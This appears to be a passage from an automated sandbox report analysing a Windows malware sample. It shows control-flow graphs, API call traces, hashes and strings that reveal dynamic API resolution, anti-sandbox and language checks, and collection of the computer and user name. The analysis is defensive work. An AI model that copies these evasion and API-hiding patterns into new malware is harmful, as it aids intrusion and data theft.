b21d81-b21d85 2194->2195 2195->2193 2197 b21d87-b21d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 b21dba-b21dc8 lstrcpy lstrcat 2199->2201 2206 b21e0a-b21e0f 2200->2206 2207 b21ded-b21def 2200->2207 2201->2200 2209 b21e11 call b02a20 2206->2209 2210 b21e16-b21e22 call b02930 2206->2210 2207->2206 2208 b21df1-b21df5 2207->2208 2208->2206 2211 b21df7-b21e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 b21e30-b21e66 call b02a20 * 5 OpenEventA 2210->2215 2216 b21e24-b21e26 2210->2216 2211->2206 2228 b21e68-b21e8a CloseHandle Sleep OpenEventA 2215->2228 2229 b21e8c-b21ea0 CreateEventA call b21b20 call b1ffd0 2215->2229 2216->2215 2217 b21e28-b21e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 b21ea5-b21eae CloseHandle ExitProcess 2229->2233
                            APIs
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018717C8), ref: 00B263E9
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018716D8), ref: 00B26402
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871648), ref: 00B2641A
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018716F0), ref: 00B26432
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01878978), ref: 00B2644B
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01865448), ref: 00B26463
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,018654C8), ref: 00B2647B
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871738), ref: 00B26494
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871780), ref: 00B264AC
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871678), ref: 00B264C4
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871768), ref: 00B264DD
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01865468), ref: 00B264F5
                              • Part of subcall function 00B26390: GetProcAddress.KERNEL32(77190000,01871690), ref: 00B2650D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B21C2F
                            • ExitProcess.KERNEL32 ref: 00B21C67
                            • GetSystemInfo.KERNEL32(?), ref: 00B21C71
                            • ExitProcess.KERNEL32 ref: 00B21C7F
                              • Part of subcall function 00B01030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                              • Part of subcall function 00B01030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                              • Part of subcall function 00B01030: ExitProcess.KERNEL32 ref: 00B01058
                              • Part of subcall function 00B010C0: GlobalMemoryStatusEx.KERNEL32 ref: 00B010EA
                              • Part of subcall function 00B010C0: ExitProcess.KERNEL32 ref: 00B01114
                            • GetUserDefaultLangID.KERNEL32 ref: 00B21C8F
                            • ExitProcess.KERNEL32 ref: 00B21CB2
                            • ExitProcess.KERNEL32 ref: 00B21CE1
                            • lstrlen.KERNEL32(018789C8), ref: 00B21CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21D15
                            • lstrcat.KERNEL32(00000000,018789C8), ref: 00B21D1D
                            • lstrlen.KERNEL32(00B34B98), ref: 00B21D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21D48
                            • lstrcat.KERNEL32(00000000,00B34B98), ref: 00B21D54
                            • lstrlen.KERNEL32(00000000), ref: 00B21D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21D94
                            • lstrlen.KERNEL32(00B34B98), ref: 00B21D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21DBC
                            • lstrcat.KERNEL32(00000000,00B34B98), ref: 00B21DC8
                            • lstrlen.KERNEL32(00000000), ref: 00B21DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21E04
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 4060ffb07505557b8fd0fa4dc9ffedb435899430e238cf8ddc9c017892640e6b
                            • Instruction ID: f57817f2f390d407d072906bfca3ba2f4d368957dc25271f4449e7463f74b079
                            • Opcode Fuzzy Hash: 4060ffb07505557b8fd0fa4dc9ffedb435899430e238cf8ddc9c017892640e6b
                            • Instruction Fuzzy Hash: A371B231500325ABCB21ABB8EC8DB6E7BF9EF55741F0404A4F90AE62A1DF749805DB70

                            Control-flow Graph

                            control_flow_graph 2850 b04a60-b04afc RtlAllocateHeap 2867 b04b7a-b04bbe VirtualProtect 2850->2867 2868 b04afe-b04b03 2850->2868 2869 b04b06-b04b78 2868->2869 2869->2867
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B04AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00B04BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: abd6a93b0adf19d868ead38088630e948a540a44d874efc077c244263d1460c8
                            • Instruction ID: 6eb5af4abc4219ffbd5a2b2583f7925494de5d9355791baaa19a9f40cdc28156
                            • Opcode Fuzzy Hash: abd6a93b0adf19d868ead38088630e948a540a44d874efc077c244263d1460c8
                            • Instruction Fuzzy Hash: 7D31D818B8021D7E8620EBEF4D47F5F7ED5DF85760F2142D6750857190CBA16581CBE2

                            Control-flow Graph

                            control_flow_graph 2957 b22ad0-b22b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 b22b44-b22b59 2957->2958 2959 b22b24-b22b36 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00B22B1A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: ff0dfe713507351f63133bf7dc4df83a0138e250fc82c80d92165e04017fdc7c
                            • Instruction ID: 726a08c73753736da218739a386d079dc876a947e34688707d90ce46fb9e8bb4
                            • Opcode Fuzzy Hash: ff0dfe713507351f63133bf7dc4df83a0138e250fc82c80d92165e04017fdc7c
                            • Instruction Fuzzy Hash: 6F01AD72A44218ABCB10CF99ED45BAAF7B8FB44B21F00026AF919E3780D7B4190086A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00B22A8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: f63a403e0056012f66b522be91c0429eb1d6eba30476b58a21d121975564f5f6
                            • Instruction ID: bdf4cd58cf4b63332b8f72e2285015a50e5944a15cbab8ea89cf90e36a98cfad
                            • Opcode Fuzzy Hash: f63a403e0056012f66b522be91c0429eb1d6eba30476b58a21d121975564f5f6
                            • Instruction Fuzzy Hash: CBF0B4B2A44314ABC700DF88DD49B9EFBBCFB04B21F000216F915E3380D7B4190486A1

                            Control-flow Graph

                            control_flow_graph 633 b266e0-b266e7 634 b26afe-b26b92 LoadLibraryA * 8 633->634 635 b266ed-b26af9 GetProcAddress * 43 633->635 636 b26b94-b26c03 GetProcAddress * 5 634->636 637 b26c08-b26c0f 634->637 635->634 636->637 638 b26cd2-b26cd9 637->638 639 b26c15-b26ccd GetProcAddress * 8 637->639 640 b26cdb-b26d4a GetProcAddress * 5 638->640 641 b26d4f-b26d56 638->641 639->638 640->641 642 b26de9-b26df0 641->642 643 b26d5c-b26de4 GetProcAddress * 6 641->643 644 b26f10-b26f17 642->644 645 b26df6-b26f0b GetProcAddress * 12 642->645 643->642 646 b26f19-b26f88 GetProcAddress * 5 644->646 647 b26f8d-b26f94 644->647 645->644 646->647 648 b26fc1-b26fc8 647->648 649 b26f96-b26fbc GetProcAddress * 2 647->649 650 b26ff5-b26ffc 648->650 651 b26fca-b26ff0 GetProcAddress * 2 648->651 649->648 652 b27002-b270e8 GetProcAddress * 10 650->652 653 b270ed-b270f4 650->653 651->650 652->653 654 b27152-b27159 653->654 655 b270f6-b2714d GetProcAddress * 4 653->655 656 b2715b-b27169 GetProcAddress 654->656 657 b2716e-b27175 654->657 655->654 656->657 658 b271d3 657->658 659 b27177-b271ce GetProcAddress * 4 657->659 659->658
                            APIs
                            • GetProcAddress.KERNEL32(77190000,01865708), ref: 00B266F5
                            • GetProcAddress.KERNEL32(77190000,01865528), ref: 00B2670D
                            • GetProcAddress.KERNEL32(77190000,01878FC0), ref: 00B26726
                            • GetProcAddress.KERNEL32(77190000,01879038), ref: 00B2673E
                            • GetProcAddress.KERNEL32(77190000,01879008), ref: 00B26756
                            • GetProcAddress.KERNEL32(77190000,0187D580), ref: 00B2676F
                            • GetProcAddress.KERNEL32(77190000,0186A5F0), ref: 00B26787
                            • GetProcAddress.KERNEL32(77190000,0187D5C8), ref: 00B2679F
                            • GetProcAddress.KERNEL32(77190000,0187D628), ref: 00B267B8
                            • GetProcAddress.KERNEL32(77190000,0187D6D0), ref: 00B267D0
                            • GetProcAddress.KERNEL32(77190000,0187D448), ref: 00B267E8
                            • GetProcAddress.KERNEL32(77190000,01865648), ref: 00B26801
                            • GetProcAddress.KERNEL32(77190000,01865728), ref: 00B26819
                            • GetProcAddress.KERNEL32(77190000,01865668), ref: 00B26831
                            • GetProcAddress.KERNEL32(77190000,01865548), ref: 00B2684A
                            • GetProcAddress.KERNEL32(77190000,0187D5E0), ref: 00B26862
                            • GetProcAddress.KERNEL32(77190000,0187D730), ref: 00B2687A
                            • GetProcAddress.KERNEL32(77190000,0186A870), ref: 00B26893
                            • GetProcAddress.KERNEL32(77190000,01865588), ref: 00B268AB
                            • GetProcAddress.KERNEL32(77190000,0187D610), ref: 00B268C3
                            • GetProcAddress.KERNEL32(77190000,0187D6E8), ref: 00B268DC
                            • GetProcAddress.KERNEL32(77190000,0187D4A8), ref: 00B268F4
                            • GetProcAddress.KERNEL32(77190000,0187D5F8), ref: 00B2690C
                            • GetProcAddress.KERNEL32(77190000,018653C8), ref: 00B26925
                            • GetProcAddress.KERNEL32(77190000,0187D598), ref: 00B2693D
                            • GetProcAddress.KERNEL32(77190000,0187D640), ref: 00B26955
                            • GetProcAddress.KERNEL32(77190000,0187D4C0), ref: 00B2696E
                            • GetProcAddress.KERNEL32(77190000,0187D550), ref: 00B26986
                            • GetProcAddress.KERNEL32(77190000,0187D700), ref: 00B2699E
                            • GetProcAddress.KERNEL32(77190000,0187D6A0), ref: 00B269B7
                            • GetProcAddress.KERNEL32(77190000,0187D670), ref: 00B269CF
                            • GetProcAddress.KERNEL32(77190000,0187D4D8), ref: 00B269E7
                            • GetProcAddress.KERNEL32(77190000,0187D658), ref: 00B26A00
                            • GetProcAddress.KERNEL32(77190000,0186F988), ref: 00B26A18
                            • GetProcAddress.KERNEL32(77190000,0187D4F0), ref: 00B26A30
                            • GetProcAddress.KERNEL32(77190000,0187D568), ref: 00B26A49
                            • GetProcAddress.KERNEL32(77190000,01865688), ref: 00B26A61
                            • GetProcAddress.KERNEL32(77190000,0187D718), ref: 00B26A79
                            • GetProcAddress.KERNEL32(77190000,018656A8), ref: 00B26A92
                            • GetProcAddress.KERNEL32(77190000,0187D688), ref: 00B26AAA
                            • GetProcAddress.KERNEL32(77190000,0187D508), ref: 00B26AC2
                            • GetProcAddress.KERNEL32(77190000,018653E8), ref: 00B26ADB
                            • GetProcAddress.KERNEL32(77190000,01865428), ref: 00B26AF3
                            • LoadLibraryA.KERNEL32(0187D520,00B2051F), ref: 00B26B05
                            • LoadLibraryA.KERNEL32(0187D460), ref: 00B26B16
                            • LoadLibraryA.KERNEL32(0187D478), ref: 00B26B28
                            • LoadLibraryA.KERNEL32(0187D6B8), ref: 00B26B3A
                            • LoadLibraryA.KERNEL32(0187D490), ref: 00B26B4B
                            • LoadLibraryA.KERNEL32(0187D538), ref: 00B26B5D
                            • LoadLibraryA.KERNEL32(0187D5B0), ref: 00B26B6F
                            • LoadLibraryA.KERNEL32(0187D8E0), ref: 00B26B80
                            • GetProcAddress.KERNEL32(77040000,01865128), ref: 00B26B9C
                            • GetProcAddress.KERNEL32(77040000,0187D880), ref: 00B26BB4
                            • GetProcAddress.KERNEL32(77040000,018789F8), ref: 00B26BCD
                            • GetProcAddress.KERNEL32(77040000,0187D7D8), ref: 00B26BE5
                            • GetProcAddress.KERNEL32(77040000,01865228), ref: 00B26BFD
                            • GetProcAddress.KERNEL32(70590000,0186A528), ref: 00B26C1D
                            • GetProcAddress.KERNEL32(70590000,018651C8), ref: 00B26C35
                            • GetProcAddress.KERNEL32(70590000,0186A618), ref: 00B26C4E
                            • GetProcAddress.KERNEL32(70590000,0187D748), ref: 00B26C66
                            • GetProcAddress.KERNEL32(70590000,0187D760), ref: 00B26C7E
                            • GetProcAddress.KERNEL32(70590000,01865248), ref: 00B26C97
                            • GetProcAddress.KERNEL32(70590000,018651A8), ref: 00B26CAF
                            • GetProcAddress.KERNEL32(70590000,0187D898), ref: 00B26CC7
                            • GetProcAddress.KERNEL32(768D0000,01865328), ref: 00B26CE3
                            • GetProcAddress.KERNEL32(768D0000,018651E8), ref: 00B26CFB
                            • GetProcAddress.KERNEL32(768D0000,0187D868), ref: 00B26D14
                            • GetProcAddress.KERNEL32(768D0000,0187D808), ref: 00B26D2C
                            • GetProcAddress.KERNEL32(768D0000,01864F88), ref: 00B26D44
                            • GetProcAddress.KERNEL32(75790000,0186A848), ref: 00B26D64
                            • GetProcAddress.KERNEL32(75790000,0186A5A0), ref: 00B26D7C
                            • GetProcAddress.KERNEL32(75790000,0187D8F8), ref: 00B26D95
                            • GetProcAddress.KERNEL32(75790000,01864FA8), ref: 00B26DAD
                            • GetProcAddress.KERNEL32(75790000,01864FC8), ref: 00B26DC5
                            • GetProcAddress.KERNEL32(75790000,0186A910), ref: 00B26DDE
                            • GetProcAddress.KERNEL32(75A10000,0187D778), ref: 00B26DFE
                            • GetProcAddress.KERNEL32(75A10000,01864FE8), ref: 00B26E16
                            • GetProcAddress.KERNEL32(75A10000,01878A28), ref: 00B26E2F
                            • GetProcAddress.KERNEL32(75A10000,0187D8B0), ref: 00B26E47
                            • GetProcAddress.KERNEL32(75A10000,0187D790), ref: 00B26E5F
                            • GetProcAddress.KERNEL32(75A10000,01865008), ref: 00B26E78
                            • GetProcAddress.KERNEL32(75A10000,01865028), ref: 00B26E90
                            • GetProcAddress.KERNEL32(75A10000,0187D8C8), ref: 00B26EA8
                            • GetProcAddress.KERNEL32(75A10000,0187D7A8), ref: 00B26EC1
                            • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00B26ED7
                            • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00B26EEE
                            • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00B26F05
                            • GetProcAddress.KERNEL32(76850000,01865268), ref: 00B26F21
                            • GetProcAddress.KERNEL32(76850000,0187D7C0), ref: 00B26F39
                            • GetProcAddress.KERNEL32(76850000,0187D838), ref: 00B26F52
                            • GetProcAddress.KERNEL32(76850000,0187D7F0), ref: 00B26F6A
                            • GetProcAddress.KERNEL32(76850000,0187D820), ref: 00B26F82
                            • GetProcAddress.KERNEL32(75690000,01865048), ref: 00B26F9E
                            • GetProcAddress.KERNEL32(75690000,01865068), ref: 00B26FB6
                            • GetProcAddress.KERNEL32(769C0000,01865088), ref: 00B26FD2
                            • GetProcAddress.KERNEL32(769C0000,0187D850), ref: 00B26FEA
                            • GetProcAddress.KERNEL32(6F8C0000,018650A8), ref: 00B2700A
                            • GetProcAddress.KERNEL32(6F8C0000,01865288), ref: 00B27022
                            • GetProcAddress.KERNEL32(6F8C0000,018652A8), ref: 00B2703B
                            • GetProcAddress.KERNEL32(6F8C0000,0187D370), ref: 00B27053
                            • GetProcAddress.KERNEL32(6F8C0000,018652C8), ref: 00B2706B
                            • GetProcAddress.KERNEL32(6F8C0000,018652E8), ref: 00B27084
                            • GetProcAddress.KERNEL32(6F8C0000,01865368), ref: 00B2709C
                            • GetProcAddress.KERNEL32(6F8C0000,018650C8), ref: 00B270B4
                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00B270CB
                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00B270E2
                            • GetProcAddress.KERNEL32(75D90000,0187D1D8), ref: 00B270FE
                            • GetProcAddress.KERNEL32(75D90000,01878A78), ref: 00B27116
                            • GetProcAddress.KERNEL32(75D90000,0187D1A8), ref: 00B2712F
                            • GetProcAddress.KERNEL32(75D90000,0187D328), ref: 00B27147
                            • GetProcAddress.KERNEL32(76470000,01865308), ref: 00B27163
                            • GetProcAddress.KERNEL32(70180000,0187D310), ref: 00B2717F
                            • GetProcAddress.KERNEL32(70180000,01865348), ref: 00B27197
                            • GetProcAddress.KERNEL32(70180000,0187D160), ref: 00B271B0
                            • GetProcAddress.KERNEL32(70180000,0187D2B0), ref: 00B271C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 676b2415b0433f490d973d755c8e90a7ea38d6d03753d9cca01d977dd0d2b442
                            • Instruction ID: 267b2f72820dbcca82f9d115b736b0d35ff6a69b90adf729f3448e6e299046e1
                            • Opcode Fuzzy Hash: 676b2415b0433f490d973d755c8e90a7ea38d6d03753d9cca01d977dd0d2b442
                            • Instruction Fuzzy Hash: C56242B9A117009FD758DF65EDA8A26B7B9FB883413148919F956C3374DBB4A800EF30
                            APIs
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F1D5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F1F1
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F1FC
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F215
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B1F220
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F239
                            • lstrcpy.KERNEL32(00000000,00B34FA0), ref: 00B1F25E
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F28C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F2C0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1F2F0
                            • lstrlen.KERNEL32(01865608), ref: 00B1F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
